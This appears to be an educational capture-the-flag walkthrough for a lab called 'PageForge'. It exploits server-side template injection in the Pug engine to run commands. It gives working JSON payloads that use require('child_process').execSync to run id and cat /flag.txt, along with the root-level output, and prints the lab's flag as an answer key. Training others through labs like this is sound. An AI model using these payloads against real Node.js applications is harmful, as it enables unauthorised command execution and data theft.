HACKR.GG
hackr.gg — PageForge — Pug SSTI RCE Walkthrough
hackr.gg — Official Walkthrough
Confidential · Educational Use Only

PageForge — Pug SSTI RCE

SSTI Injection · SSTI Remote Code Execution (Pug)
Difficulty
Intermediate
Vuln class
SSTI Remote Code Execution (Pug)
Steps
3
// Objective
Exploit Pug template injection to achieve RCE and read the flag from the filesystem.
// Tools required
BrowserBurp Suitecurl
// Step-by-step walkthrough
1
Confirm Pug template injection
The page template field accepts Pug syntax. Inject a Pug expression to confirm evaluation.
Command / Input
POST /api/render {"template":"= 7*7"}
Output
49
2
Achieve RCE via Pug's Node.js context
Pug runs in Node.js. Use the global process object or require() to execute OS commands.
Command / Input
POST /api/render {"template":"- var x=require('child_process').execSync('id').toString(); = x"}
Output
uid=0(root) gid=0(root) groups=0(root)
Pug's - prefix allows raw JavaScript. require() gives access to Node built-ins.
3
Read the flag
Execute cat /flag.txt via the same RCE path.
Command / Input
{"template":"- var x=require('child_process').execSync('cat /flag.txt').toString(); = x"}
Output
HackrGG{sst1_pug_t3mpl4t3_rc3}
// Flag
Flag value
HackrGG{sst1_pug_t3mpl4t3_rc3}
Read from /flag.txt via Pug template RCE using child_process.execSync.
hackr.gg · Cybersecurity Education PlatformEducational use only · Do not distribute